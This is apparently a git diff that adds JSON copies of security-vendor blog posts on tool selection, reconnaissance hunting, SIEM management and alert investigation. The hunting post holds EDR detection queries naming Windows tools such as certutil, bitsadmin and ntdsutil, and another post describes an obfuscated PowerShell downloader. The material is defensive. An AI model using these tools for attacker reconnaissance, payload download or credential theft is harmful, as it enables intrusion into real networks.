sounds familiar, then it\u2019s time to re-evaluate whether the security tools you\u2019ve got in place today are the right ones for \u201cthe new you.\u201d Before you pour time and money into an assessment, make sure you\u2019ve got some basic tech in place that\u2019ll keep your org\u2019s data protected while you focus on building that longer-term strategy. I know \u2026 that\u2019s sometimes easier said than done. How do you know what kind of tools to invest in? What\u2019s essential and what\u2019s a nice-to-have? In addition to making sure each new tool you invest in will make you and your team more productive and efficient, here are a few tips to consider when thinking about what security tools to keep or buy. Get the obvious and inexpensive controls in place Here\u2019s the TL;DR: Don\u2019t overthink it. Talk to some peers and maybe an analyst. Then make some quick decisions. This first step doesn\u2019t need to turn into a lengthy shootout \u2014 in fact, the longer you take to get the obvious stuff in place like endpoint security and reasonable remote access controls, the greater your risk becomes. There are a few \u201cabsolute goods\u201d that every enterprise should have regardless of whether you\u2019re cloud native or living behind layers of firewalls and surrounded by mainframes. You don\u2019t need a high priced consultant to tell you that having one unified, fully deployed endpoint protection solution is a good thing. Know the broad buckets of tools you need Now that you\u2019ve plugged the big holes, dig down a layer. Ideally you\u2019ve got time (and some in-house expertise) to do a quick NIST CSF self-assessment . That will give you a good gut check of where your big gaps are and where you may be doing better than you think. Once you get through that assessment, jot down the broad buckets of tools you need to have in place to adequately cover the big gaps you see. I\u2019m not talking about specific products, just the big areas that you need to solve for with some kind of tech. 
Pay attention to what\u2019ll give you the biggest \u201cbang for the buck\u201d \u2014 the places where you can make the most impact on your security posture with the fewest products. There are five big buckets that come to mind, ranked from most important to \u201cyou can worry about this a little later:\u201d \u2713 endpoint controls \u2713 network controls \u2713 identity and access controls \u2713 device management tools \u2713 data consolidation tools (like a SIEM) Do you have at least one tool in place already that falls into each of those categories? If so, that\u2019s great. If not, perhaps you can tweak an existing tool to do the trick. If not, then you\u2019ve got an obvious gap and you should probably focus on making sure you cover that area first before you bring on any more tech. Now, new technology isn\u2019t always the answer (in fact, it sometimes can make things worse). Be sure to pay attention to areas like third-party risk and supply chain risk where process controls are usually far more effective than throwing a product or service at the problem. Make sure any new tech integrates with your existing operational controls Before you go on a buying spree, think about how a new-to-you tool needs to behave in order to integrate with your current operational controls. For instance, if a vendor offers multiple solutions that you can manage as a single unit (I\u2019m thinking of vendors that have unified endpoint and network controls as an example) and you already have one of their solutions, make your life easier and go that route. It may not be the perfect solution, but you\u2019ll likely suffer \u201cdeath by complexity\u201d way before \u201cdeath by lousy product.\u201d Your staff is already familiar with the interfaces and management strategies with these systems, reducing the chances that you\u2019re buying shelfware. Once you get the basics of your program in place and generally have the controls you want, then you can start picking better or different solutions to solve specific problems. From a procurement perspective, keep your contracts short. Now is not the time to lock yourself into a three-year agreement with a service or tool you may want to throw overboard in 12 months. Pay attention to what will (or won\u2019t) work with your infrastructure Last but not least, think about your current infrastructure and whether this new tech will work reliably in that environment. For example, do most of your employees use Macs or PCs? If you\u2019re primarily a Mac shop, don\u2019t choose tech that only runs on Windows OS. Make sure whatever you choose runs well across all the platforms your teams use. Once you\u2019ve figured out the must-haves and can\u2019t-haves from an operational controls and infrastructure perspective, dive deeper into each of those broad buckets of tools I mentioned above. Now start thinking about specific tools you need to add to your stack. For example, tech like network firewalls, web application firewalls, proxy servers and VPN servers, among others, fall under the \u201cnetwork controls\u201d category. Now that you\u2019ve got some new security tech to add to your tool chest, you\u2019ll rest (somewhat) easier at night knowing that you and your team have the basics covered. That said, there are no perfect tools \u2014 so pay attention to how they\u2019re working for your org and whether they\u2019re making your analysts more productive and efficient. 
If you\u2019re looking for even more tips on how to evaluate your security tools over time, check out \u201cGet your security tools in order: seven tactics to know.\u201d" +} \ No newline at end of file diff --git a/how-to-hunt-for-reconnaissance.json b/how-to-hunt-for-reconnaissance.json new file mode 100644 index 0000000000000000000000000000000000000000..e389610c666fc1ad0262462e4d4ea51382db7ad2 --- /dev/null +++ b/how-to-hunt-for-reconnaissance.json @@ -0,0 +1,6 @@ +{ + "title": "How to hunt for reconnaissance", + "url": "https://expel.com/blog/how-to-hunt-for-reconnaissance/", + "date": "Aug 2, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to hunt for reconnaissance Tips \u00b7 5 MIN READ \u00b7 ALEC RANDAZZO \u00b7 AUG 2, 2018 \u00b7 TAGS: Example / How to / Hunting / Mission Remember the last time you moved to a new city? If it was before the smartphone era it probably took a little driving around to find the best grocery store, coffee shop and whatever other places you were looking for. That\u2019s reconnaissance. And it\u2019s the same thing a threat actor does after compromising a network. Assuming they\u2019re not an insider, once a threat actor gets a foothold in your environment they\u2019ll need to get the lay of the land and learn more about the systems they\u2019re on, the layout of your network and the network\u2019s Active Directory. That\u2019s how attackers figure out what systems and users they\u2019ll have to target to accomplish their ultimate objective \u2013 whether it\u2019s stealing data, stealing money or encrypting your data and extorting you for a ransom payment. When attackers do reconnaissance (attacker tactic), they perform actions that aren\u2019t things most users typically do (hunting hypothesis). Hunting for reconnaissance activity is the process of identifying those, often abnormal, activities. And when it comes to reconnaissance, time is of the essence. When you find a threat actor late in the game, it chews up a lot more time and money. Plus, the potential damage to an organization\u2019s reputation is much higher. Ideally, you want to catch and stop a threat actor as early as possible so they can\u2019t cause too much heartache. That\u2019s why hunting for reconnaissance is important. Where do you start? If you\u2019re interested, more broadly, in how to hunt, check out our previous blog post, What is (cyber) threat hunting and where do you start? It outlines a five-step process that you can use for any hunting exercise. I\u2019m going to walk you through, specifically how to apply that process to hunt for reconnaissance. I\u2019ve already addressed the first two steps above, so let\u2019s jump straight to step three. Hunting process overview Gathering data There are a couple things you\u2019ll want to consider as you figure out what data you need to gather to do your hunting. Of course, you want to make a list of the things you\u2019re looking for. But that list will be constrained by your ability to go get the data. Usually, that boils down to the tools you\u2019ve got to fetch the data. So that\u2019s where we\u2019ll start. In this example, we\u2019re going to assume that we\u2019ve got an endpoint detection and response (EDR) tool in place. At Expel, we use lots of different EDR tools including Carbon Black, Crowdstrike, Endgame, FireEye and Tanium. In this example, we\u2019ll show the query for Carbon Black and Crowdstrike to gather the baseline data. But any of the above EDR tools are equally capable. 
Next, we identify the tools that a threat actor could use to perform reconnaissance. We focused on built-in Windows tools that attackers can use to do discovery on the network, Active Directory, or local system. For instance, threat actors will heavily use Windows \u201cnet.exe\u201d commands to query Active Directory in order to enumerate systems, users, and groups. We also focused on these tools being used from a command line process such as \u201ccmd.exe\u201d and \u201cpowershell.exe\u201d. The query below can be used in Carbon Black to return the processes that match our reconnaissance criteria. (parent_name:cmd.exe OR parent_name:powershell.exe) AND (process_name:ver.exe OR process_name:tasklist.exe OR process_name:systeminfo.exe OR process_name:net.exe OR process_name:net1.exe OR process_name:whoami.exe OR process_name:qprocess.exe OR process_name:query.exe OR process_name:ping.exe OR process_name:type.exe OR process_name:reg.exe OR process_name:wmic.exe OR process_name:wusa.exe OR process_name:netsh.exe OR process_name:rundll32.exe OR process_name:sc.exe OR process_name:at.exe OR process_name:fsutil.exe OR process_name:nslookup.exe OR process_name:wevtutil.exe OR process_name:nltest.exe OR process_name:csvde.exe OR process_name:dsquery.exe OR process_name:nbtstat.exe OR process_name:netstat.exe OR process_name:qwinsta.exe OR process_name:vssadmin.exe OR process_name:tcping.exe OR process_name:netdom.exe OR process_name:certutil.exe OR process_name:bitsadmin.exe OR process_name:schtasks.exe OR process_name:ntdsutil.exe OR process_name:find.exe OR process_name:findstr.exe OR process_name:nbtscan.exe OR process_name:dsget.exe) The query below is the Crowdstrike equivalent. ImageFileName=\"*ver.exe\" OR ImageFileName=\"*tasklist.exe\" OR ImageFileName=\"*systeminfo.exe\" OR ImageFileName=\"*net.exe\" OR ImageFileName=\"*net1.exe\" OR ImageFileName=\"*whoami.exe\" OR ImageFileName=\"*qprocess.exe\" OR ImageFileName=\"*query.exe\" OR ImageFileName=\"*ping.exe\" OR ImageFileName=\"*type.exe\" OR ImageFileName=\"*reg.exe\" OR ImageFileName=\"*wmic.exe\" OR ImageFileName=\"*wusa.exe\" OR ImageFileName=\"*netsh.exe\" OR ImageFileName=\"*rundll32.exe\" OR ImageFileName=\"*sc.exe\" OR ImageFileName=\"*at.exe\" OR ImageFileName=\"*fsutil.exe\" OR ImageFileName=\"*nslookup.exe\" OR ImageFileName=\"*wevtutil.exe\" OR ImageFileName=\"*nltest.exe\" OR ImageFileName=\"*csvde.exe\" OR ImageFileName=\"*dsquery.exe\" OR ImageFileName=\"*nbtstat.exe\" OR ImageFileName=\"*netstat.exe\" OR ImageFileName=\"*qwinsta.exe\" OR ImageFileName=\"*vssadmin.exe\" OR ImageFileName=\"*tcping.exe\" OR ImageFileName=\"*netdom.exe\" OR ImageFileName=\"*certutil.exe\" OR ImageFileName=\"*bitsadmin.exe\" OR ImageFileName=\"*schtasks.exe\" OR ImageFileName=\"*ntdsutil.exe\" OR ImageFileName=\"*find.exe\" OR ImageFileName=\"*findstr.exe\" OR ImageFileName=\"*nbtscan.exe\" OR ImageFileName=\"*dsget.exe\" Filtering the data Once you run the above query, you\u2019ll be rich with data. When we initially tested this hunting technique on a mid-sized network, we saw over two million results in a 30-day window. That\u2019s more than any human could possibly review in a reasonable amount of time. When you start to filter that data down, the trick is to reduce the volume of things you need to look at without diluting the value of the results. 
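If you want to experiment with that kind of reduction yourself, a little scripting goes a long way. The snippet below isn't part of our tooling - it's a minimal sketch that assumes you've exported your EDR results to a CSV with hostname, parent process ID, process name and timestamp columns (the file and column names are made up). It groups events by parent process and keeps only the parents that launched several distinct recon tools inside a five-minute window - the same filtering idea we describe next.

```python
import csv
from collections import defaultdict
from datetime import datetime, timedelta

# Illustrative names: an export called events.csv with hostname,
# parent_guid, process_name and ISO 8601 timestamp columns.
RECON_TOOLS = {"net.exe", "net1.exe", "whoami.exe", "nltest.exe", "systeminfo.exe",
               "tasklist.exe", "dsquery.exe", "qwinsta.exe", "netstat.exe"}
WINDOW = timedelta(minutes=5)
THRESHOLD = 3  # distinct recon tools spawned by one parent process

by_parent = defaultdict(list)
with open("events.csv", newline="") as fh:
    for row in csv.DictReader(fh):
        name = row["process_name"].lower()
        if name in RECON_TOOLS:
            by_parent[(row["hostname"], row["parent_guid"])].append(
                (datetime.fromisoformat(row["timestamp"]), name))

for (host, parent), events in by_parent.items():
    events.sort()
    for i, (start, _) in enumerate(events):
        # Distinct recon tools this parent launched within five minutes of this event
        tools = {n for t, n in events[i:] if t - start <= WINDOW}
        if len(tools) >= THRESHOLD:
            print(f"{host} parent={parent}: {sorted(tools)} within five minutes")
            break
```

A real implementation would pull results straight from your EDR's API rather than a CSV export, but the grouping logic stays the same.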
One way we do that is by looking for frequent use of these tools in a short period of time \u2013 specifically single command line processes which call at least three of these tools in a five-minute window. Why do we use this? Based on our experience, if a threat actor is trying to understand a victim\u2019s network, it\u2019s going to take more than a single command. They\u2019ll likely have to execute several (or at least more than three) commands in any given five-minute window. When we apply this filtering logic, it reduced our dataset by 99.96 percent from over two million rows to about 800 rows. That\u2019s a lot more manageable! Reviewing the results Now that we\u2019ve shrunk the volume of data it\u2019s pretty straightforward to review. We just need to remind ourselves of the questions we\u2019re trying to answer. In this case, we\u2019re asking ourselves \u201cIf I were a threat actor, what would this reconnaissance command get me and would that be useful if I was trying to learn more about my surroundings?\u201d You\u2019ll find that by viewing the data with that question as your lens you\u2019ll be able to quickly write off a lot of the data as benign so you can focus on the things you\u2019re going to want to dig into further. When you find something you want to dig into, you can use the process viewer in your EDR tool to get more insight into other processes that were spawned by that parent command line process. In our testing, it took an experienced analyst less than 30 minutes to review the results from this hunt. Given how easy it is to review the data and the high value it provides we didn\u2019t need to refine it any further. Finally, if you do uncover malicious activity it\u2019s a good idea to convert the process command line arguments into an alert trigger in your EDR tool so you\u2019ll be immediately notified if it happens again. That\u2019s a wrap So there you have it. If you\u2019ve got an EDR tool that gives process-level insights give this technique a shot. We think it\u2019s a pretty straightforward and effective approach to find attacker activity when they\u2019re still early in the attack lifecycle. Happy hunting." +} \ No newline at end of file diff --git a/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json b/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json new file mode 100644 index 0000000000000000000000000000000000000000..372db3c76e1da521e97ef179ea00664dab127ae1 --- /dev/null +++ b/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json @@ -0,0 +1,6 @@ +{ + "title": "How to identify when you've lost control of your SIEM (and ...", + "url": "https://expel.com/blog/how-to-identify-when-youve-lost-control-of-your-siem/", + "date": "May 23, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to identify when you\u2019ve lost control of your SIEM (and how to rein it back in) Security operations \u00b7 6 MIN READ \u00b7 DAN WHALEN AND LORI EASTERLY \u00b7 MAY 23, 2018 \u00b7 TAGS: Management / SIEM / SOC / Tools Throw a rock in a room full of security folk and you\u2019d be hard pressed to hit someone who wouldn\u2019t agree that a well-oiled SIEM can level up a security operations center (SOC) \u2013 improving threat detection capabilities, reducing time to remediation and serving as a go-to resource for your threat hunters (if you\u2019re lucky enough to have them). But managing that SIEM can turn into a much larger effort than you anticipated when you signed the order form. 
And sometimes when you put a ton of effort into something it\u2019s easy to lose sight of what you were trying to achieve in the first place. You can end up making choices that contradict your original goals (psychologists call this cognitive dissonance ). And therein lies the problem. What\u2019s an acceptable compromise? And how high should your SIEM pain tolerance be? Four tell-tale signs you\u2019ve lost control 1. \u201cThe SIEM is down again!\u201d Exasperated sighs all around. Analysts throwing their hands up in the air. Muttered grumblings\u2026then chuckles. \u201cI guess we should just take a break, huh?\u201d If your SIEM crashes so often that it has acquired profane nicknames, consider it a sign. 2. Your security investigations are littered with plot holes A plot hole in a good story can be disappointing. But a plot hole in a security investigation can be the difference between a false positive and a business-ending incident (yes, that\u2019s a bit dramatic \u2013 but not unheard of ). If your analysts or incident responders are having trouble answering basic investigative questions like: What is it? How did it get here? Did it run? What happened after? Was data accessed? \u2026 you may be headed for an unfortunately dramatic chapter. 3. You\u2019ve created a SIEM-to-human language lexicon When you first got your SIEM, it probably seemed simple enough: a few data sources, a reasonable detection strategy and process documentation for your analysis team. But fast forward a few months, and pressures to plug new tools in, anxiety about new alerting needs and a heap of unexpected business requirements have seriously complicated things. In fact, it seems like nobody knows what\u2019s going on. You\u2019re not even entirely sure what data is actually available in your SIEM these days. The last time you tried to answer questions like \u201cdo we detect attacker technique X?\u201d your head started to spin. You\u2019ve tried to thoroughly document data sources, formats, detection rules and other nuances along the way, but keeping this information up to date is hard (and it\u2019s even harder to make it interesting enough for your analysts to do it). Keep an eye out for the following signs that your team is feeling data management pain: Only one or two analysts really understand how the SIEM is generating alerts Analysts aren\u2019t speaking the same language \u2013 two analysts will use different terminology for the same activity Different analysts are taking different decision paths for the same alerts It takes hours for analysts to acquire the evidence they need to run down an alert Analysts have to be experts in logging technologies to interpret alerts correctly 4. Your analysts are doing the tasks you hired your SIEM to do If you haven\u2019t tuned your SIEM since you installed it (or perhaps you never tuned it in the first place), there\u2019s a good chance your analysts are spending most of their time handling low-value security alerts. If you\u2019ve got analysts that aren\u2019t \u201cinvestigating\u201d anymore because they\u2019re too busy clicking the same buttons over and over again (or copy-and-pasting information from one location to another for every alert), then they\u2019re doing what the SIEM was meant to do. Without proper tuning, your SIEM is going to spew out alerts like a fire hydrant on a hot summer day. And that can create an unvirtuous circle. We\u2019ve touched on this before , but predictably this doesn\u2019t lead to happy security analysts . 
If analysts are constantly under water and days behind on security investigations, it\u2019s time to take a look at where they are spending their time. And that probably means getting control of your SIEM. To regain control, remind yourself why you got a SIEM in the first place If you nodded your head at any (or all) of the above warning signs, hope is not lost. You can rein in your SIEM and show it who\u2019s boss. We\u2019ve seen many people do it. And it starts with taking a step back to look at the big picture. One of the easiest ways to shed our blinders is to remind ourselves why we got a SIEM in the first place. If you\u2019ve got your original SIEM project requirements bouncing around your inbox or (gulp) in a file cabinet somewhere, pull them out. If not, take out a pencil and do your best to reconstruct them. Everyone\u2019s list will be different, but chances are, it looks something like this: Consolidate my security data in one place Detect more security events and incidents Speed up investigation and response processes Reduce analyst error rates Quantify and report on how we\u2019re doing Proactively hunt for threats we missed OK. Now that you\u2019ve got the list of where you want to get (back) to, get all of your stakeholders in a room and start asking some tough questions: Hey analyst\u2026 How often can you get all of the information you need to finish an investigation? How quickly can you retrieve the data you need? Any outliers? How often do you have to augment data with information stored elsewhere (wiki, KB, your brain) to understand and interpret it? How quickly can you tune a false positive or create a new detection in the SIEM? Where do you spend most of your time? Hey security engineer\u2026 How easy is it to onboard a new technology to the SIEM? How often do you have to perform unexpected maintenance on the SIEM? Where do you spend most of your time? Hey manager\u2026 How often are you able to generate the report you need with the SIEM? Can your team use your SIEM to provide quick answers about your security posture? Or does that require spreadsheets and unnatural acts? Chances are, just by soliciting feedback, you\u2019ll learn a lot about what is and isn\u2019t working well. Whether you\u2019ve just gone a bit off the rails or careened over a cliff, you\u2019ve now identified some areas of opportunity. Now\u2026resist the urge to try and fix everything at once! As you prioritize, keep the value-to-effort ratio in mind. Identifying quick wins and the big pain points will focus your time and resources where they matter most. There are usually several smaller items that \u2013 taken together \u2013 can make a significant impact on the day-to-day workflow of your team. For example, reviewing and tuning high volume, low value events can help to limit alert fatigue. Reviewing top reporting use cases and building dashboards can enable managers to self-serve answers to common questions instead of tying up analysts. To regain control, you\u2019ll also need to come to terms with two key things your SIEM will never do. 1. A SIEM won\u2019t solve all of your data problems It may be tempting to simply point everything at the SIEM and declare success. But it\u2019s not quite that simple. In fact, you probably shouldn\u2019t make data management someone\u2019s part-time job\u2026 because it\u2019s a full-time job. These tips will help avoid some future pain: Prioritize what you put in based on what\u2019s most valuable to stakeholders. 
Standardize on common logging formats and a single time zone across log sources (UTC if possible). Your analysts will be relieved they no longer have to apply time zone offsets. Understand how data will be used for alerting and document it. Agree on and document a common detection methodology. The MITRE ATT&CK framework is a great place to start. Routinely review the efficacy of SIEM rules using a feedback process that\u2019s quick and easy. 2. Your SIEM != an incident response process This may seem obvious, but installing a SIEM doesn\u2019t mean you have an incident response process . You need to document that separately ( check this out for starters), and it should be decoupled from specific technologies. Your IR process will document steps like \u201cIdentify if the malware ran\u201d instead of \u201crun this query in Splunk.\u201d The latter is great information to share within your analysis team wiki or KB, but you shouldn\u2019t limit your IR process based on the capabilities of the technologies you have in place. Otherwise, you run the risk of sweeping technology deficiencies under the rug instead of highlighting and improving them. Define a great incident response process, and record how the day-to-day execution measures up. In conclusion\u2026 If you\u2019re in the lucky crowd that still has control of your SIEM, congratulations! Just remember it\u2019s easier to regain control when you identify things are getting out of whack early. So\u2026 put a reminder in your calendar to check for these warning signs quarterly. If you\u2019ve decided things are out of control, go through the steps we\u2019ve outlined above. And don\u2019t try to fix it all in one night \u2013 prioritizing your improvements into bite-sized chunks will make them less daunting and you\u2019ll start to see the fruit of your labor sooner. Finally, if you\u2019ve decided that things are out of control and that you need some help to get them back on the rails you\u2019re not alone. There are lots of people who can help depending on your needs: Talk to your SIEM vendor (with your analysts!)\u2013 they may offer professional services worth exploring, and it\u2019s in their best interests to keep you satisfied with your deployment. Consultants can assist with executing on your prioritized list of improvements if you don\u2019t have the resources to spare. Co-managed SIEM services may be worth exploring if you have realized that you don\u2019t want to take on the day-to-day work of keeping your SIEM happy (but don\u2019t breeze by the details here \u2013 make sure you\u2019ll still have the visibility and control you need). If you\u2019re looking to go a step further and augment incident detection and response work, managed detection and response solutions might be a fit as well. Any which way, knowing which category you\u2019re in and figuring out your next step is half the battle." 
+} \ No newline at end of file diff --git a/how-to-investigate-like-an-expel-analyst.json b/how-to-investigate-like-an-expel-analyst.json new file mode 100644 index 0000000000000000000000000000000000000000..0cb06085f06352c663ba475b617f72103a1e8be1 --- /dev/null +++ b/how-to-investigate-like-an-expel-analyst.json @@ -0,0 +1,6 @@ +{ + "title": "How to investigate like an Expel analyst", + "url": "https://expel.com/blog/how-to-investigate-like-analyst-expel-workbench-managed-alert-process/", + "date": "Dec 15, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to investigate like an Expel analyst: The Expel Workbench managed alert process Security operations \u00b7 8 MIN READ \u00b7 BEN BRIGIDA AND DESHAWN LUU \u00b7 DEC 15, 2020 \u00b7 TAGS: MDR / SOC / Tech tools There aren\u2019t many jobs where highly motivated, competent and well-funded groups of people from all over the world are trying to trick you at every turn. But that\u2019s the reality for every SOC or MDR analyst. Change is constant; once the bad guys get caught enough times, they mix it up and evolve their tactics. And that\u2019s just the malicious stuff! Keep in mind that alerts flag activity on the network or endpoint that might be bad, which means the vast majority of alerts an analyst will look at throughout their career will most likely be completely benign. Analysts have to approach every alert with the same mindset and process. They don\u2019t know if the alert is malicious or benign when they start working. Their job is challenging enough; we don\u2019t want them to have to reinvent an investigation process for each and every alert too. So how do we ensure that our analysts are efficient and consistently performing high-quality decision making? That\u2019s where the Expel Workbench\u2122 managed alert process (MAP) comes in. How the process works TL;DR We set a goal to answer investigative questions with each alert We use the investigative process, \u201cOSCAR\u201d (which stands for orient, strategize, collect evidence, analyze and report), to answer those questions The decision path is how alerts move through our system as we investigate At Expel, we look at alerts across a diverse customer base on over 60 unique vendor technologies. There\u2019s a lot of variety. The good news for Expel analysts is that the goal, investigative process and alert workflow is consistent for every alert we review. The image below shows how we refer to each of these things and provides a quick summary as well. Expel Workbench managed alert process It starts by asking questions Why do we need to ask questions? Because attackers are creative. They evolve their methods, make decisions to evade detection and try to blend in. In our experience, an investigative runbook containing a rote set of steps is inflexible in the face of change and removes thinking and analysis from the process, which sooner or later results in missed attacker activity (and attackers make sure it\u2019s sooner). We need to give analysts the freedom to be creative when they need to be, while also providing guardrails to ensure each alert that we look at meets our standard of quality . The questions-based investigative process forces analysts to rely on critical thinking skills to assess what is actually happening in the alert. This gives analysts the space to analyze the activity and find novel attacker behaviors, and the flexibility to do it on the widest variety of alert signal. The Goal During alert triage, our goal is to answer the question: what is this activity? 
For every malicious event, we then seek to answer all five investigative questions: What is this activity? Where is it? When did it get here? How did it get here? What does the customer need to do? Expel\u2019s transparent platform, the Expel Workbench, allows customers to see what alerts were closed as benign and why. We can\u2019t get away with closing something benign without explaining why. Asking our analysts to focus on describing the purpose of the activity the alert is associated with helps them close alerts more confidently. This also allows customers or other analysts to understand the analysis that led to that conclusion. The Expel Workbench managed alert process First, let\u2019s cover the different ways an alert can travel through the system as analysts answer the investigative questions. This process breaks down into five buckets and maps to the investigative questions, shown in the image below: Alert Decision Pathway Here\u2019s exactly what our SOC analysts do during each phase of an investigation: Triage \u2013 Based on the information at hand, the analyst attempts to determine if the alert is benign (move to close) or malicious (move to incident). If the analyst requires more information to make a decision, they move the alert to a state called \u201cinvestigate.\u201d In the Triage and the Investigate state, analysts use the OSCAR investigative process to answer the first investigative question: what is this activity? Investigate \u2013 This is when we need more data to understand the activity. At this stage, Expel Workbench empowers the analyst to query any of the customers integrated security technology for additional information to help determine if the alert hit on malicious activity using \u201cinvestigative actions.\u201d Investigative actions use the security devices\u2019 APIs to acquire and format additional data in order to make a determination about whether the activity is malicious or benign. Investigative actions fall into two categories: query [indicator] and acquire [artifact]. Querying an indicator looks for an indicator in process events, network events, etc. Examples of investigative actions are query IP, query domain, query file, acquire file, query host and query user. Analysts can also run any of our Ruxie automated actions, such as \u201ctriage a suspicious login\u201d or \u201cGoogle Drive audit triage.\u201d (More on Ruxie later.) Incident \u2013 If we determine the activity is malicious, we declare a security incident and answer the remaining investigative questions which focus on determining the scope of the compromise \u2013 what the compromise is, when it started and how many hosts are affected. Close \u2013 If we determine the alert does not represent malicious activity, we close the alert from the triage stage or the investigation stage with a close category and a close reason. (Ex: Close Category \u2013 benign; Close Reason \u2013 No evidence of malicious activity was found. This activity is common in the environment and across our customer base, and is expected for this user\u2019s role. This is a known-good application.) Notify \u2013 If an analyst determines that the alert does not represent a compromise, but does represent interesting or potentially risky activity, they will notify the customer and provide the rationale for notification. Anything that appears malicious is promoted to an incident; closed alerts and investigations that are not promoted to incidents are implicitly not malicious. 
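To make the decision path a little more concrete, here's a toy model of those states and the legal moves between them. This isn't Expel Workbench code - just an illustrative sketch showing that an alert only leaves triage or investigate by becoming an incident, a closed alert (with a close category and reason) or a customer notification.

```python
from enum import Enum, auto

class AlertState(Enum):
    TRIAGE = auto()
    INVESTIGATE = auto()
    INCIDENT = auto()
    CLOSE = auto()
    NOTIFY = auto()

# Legal transitions along the decision path described above.
TRANSITIONS = {
    AlertState.TRIAGE: {AlertState.INVESTIGATE, AlertState.INCIDENT, AlertState.CLOSE, AlertState.NOTIFY},
    AlertState.INVESTIGATE: {AlertState.INCIDENT, AlertState.CLOSE, AlertState.NOTIFY},
    AlertState.INCIDENT: set(),
    AlertState.CLOSE: set(),
    AlertState.NOTIFY: set(),
}

def move(alert, new_state, **details):
    """Advance an alert to a new state, enforcing the decision path."""
    if new_state not in TRANSITIONS[alert["state"]]:
        raise ValueError(f"can't move from {alert['state'].name} to {new_state.name}")
    if new_state is AlertState.CLOSE and not {"close_category", "close_reason"} <= details.keys():
        raise ValueError("closing an alert requires a close category and close reason")
    alert.update(state=new_state, **details)
    return alert

alert = {"id": "example-alert", "state": AlertState.TRIAGE}
move(alert, AlertState.INVESTIGATE)
move(alert, AlertState.CLOSE, close_category="benign",
     close_reason="No evidence of malicious activity; known-good application.")
```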
The investigative process, AKA OSCAR The Expel investigative process is based on a similar process developed by Sherri Davidof and Jonathan Ham, and discussed in the book \u201cNetwork Forensics Tracking Hackers through Cyberspace.\u201d It\u2019s an iterative process loosely based on the observe, orient, decide, act (OODA) loop and specifically tailored for cyber security investigations. Expel augments this process with technology that helps analysts document their work and guide them toward the next step in the investigation. It starts with an alert, which contains a set of information related to potentially malicious activity. The Expel Workbench provides a number of decision support tools to assist analysts during this process \u2013 customer context, automated workflows , data enrichment and investigative actions . (Keep an eye out for a future blog post about our decision support tools.) As a transparent security platform, we notify the customer throughout this journey based on configurable customer preferences. Our process looks like this: Expel Investigative Process Orient \u2013 Understand the purpose of the alert and the information available. We encourage analysts to answer the following four questions at this stage. What is this alert looking for? Where is this in an attack lifecycle (i.e. MITRE Tactics)? What context do I have? What alert data do I have? Strategize \u2013 Determine what additional questions need to be answered and where to look for the answers. Identify and prioritize what data is needed to answer the remaining investigative questions. Determine if you should involve additional resources or escalate to more senior members of the team. Collect Evidence \u2013 Acquire and parse the highest priority data. Analyze \u2013 Review the data to determine if you were able to answer the investigative questions: Does this answer what I want to know? Report \u2013 Final summary of the investigation: This is what I know. The OSCAR process is an iterative loop. As the analyst answers questions, they develop new questions and need to collect additional evidence until they are able to achieve the goal of answering our five investigative questions. The investigative questions (goal), decision path and investigative process don\u2019t change on a per-technology or per-operating system basis, even though the techniques used by the attacker and the format of the evidence do change. The Expel Workbench MAP in action Let\u2019s walk through the process for an alert on a Windows 10 workstation as an example. Phishing emails containing malicious attachments are one of the most common ways users get compromised, so let\u2019s take a look at how this all comes together for activity related to a macro-enabled document. We\u2019ll follow an alert through the decision path as we apply the Expel investigative process in order to answer the investigative questions, starting with: what is this activity? Orient The initial alert comes from a suspicious Microsoft Office suite process relationship. Expel Workbench alert What is the alert looking for? An attacker tricking the user into opening a malicious Microsoft Office document that uses macros to spawn a scripting interpreter, which downloads and executes a malicious script. Where is this in an attack lifecycle (i.e. MITRE Tactics)? Initial access / Phishing / Attachment Execution/User Execution/Malicious File Command and Scripting Interpreter What context do I have? 
Analytics in Expel Workbench tell us the alert doesn\u2019t fire often (<1 a day across all customers) and it frequently leads to investigations and incidents. Additionally, Expel\u2019s machine learning algorithms focused on PowerShell args have increased the alert severity. What alert data do I have? We have the following in the alert itself: Asset Details, Process Details (Process Tree, Process Arguments, etc), Network Connections, File Modifications and Registry Modifications. Strategize We want to determine what questions we need to answer and what data we need to get those answers. Is PowerShell reaching out to a website to download something? (Process Args) Are the PowerShell arguments suspicious? (Process Args) Is the domain suspicious/malicious? (Network Connections, Process Args, Open-source intelligence [OSINT]) Is the downloaded file suspicious/malicious? (File Writes, Network Connections, Packet capture [PCAP], Process Args, OSINT) Is the document that spawned PowerShell suspicious? (File Information, File Listing, Network Traffic, PCAP data) We then prioritize the review of available evidence and, if necessary, the acquisition of additional evidence. The prioritized list for this alert would be process args, network connections and additional OSINT to evaluate Domains and IPs. Collect Evidence In this investigation, the automated alert enrichment capabilities powered by our robot, Ruxie, have provided all required information in the alert details in Expel Workbench. Analyze The PowerShell argument is heavily obfuscated. We need to decode it. Ruxie can handle all the decoding for this particular alert, and will even disassemble the shell code. PowerShell Arg Using a search engine to look up the arguments from the decoded payload, it\u2019s easy to determine that the argument reads the shellcode into memory and executes it. This spawns network connections to the host EXAMPLE[.]com. Automation within the Expel Workbench, uses Greynoise and Ipinfo to evaluate the EXAMPLE[.]com domain against OSINT and determines that it has no web presence and is not known in OSINT repositories. Report Now we can answer the first question: what is this activity? We\u2019ve determined that a Microsoft Office document spawned a scripting interpreter (PowerShell) that connected to a suspicious site in order to download and execute an unknown script from memory. This is classic malicious downloader behavior \u2013 definitely bad. On the decision path, this alert would move from the triage phase directly to an incident. The process of moving the alert to an incident generates a notification for the customer. Time is of the essence for a malicious file, so we want to get them started on remediation even before we have finished answering the rest of the investigative questions. An example of the report we would generate for this instance is below. Commodity malware findings How the Expel Workbench managed alert process helps you The job of a SOC/MDR analyst is uniquely challenging. They go up against motivated and talented adversaries who constantly change tactics and environments. Analysts have to be constant learners . In order to foster creativity we believe it\u2019s important to define what the goal is, explain the stops on the journey and provide a framework that enables consistently thorough investigations. This process works well for our analysts, but it doesn\u2019t mean that the Expel Workbench managed alert process is a fail-safe. 
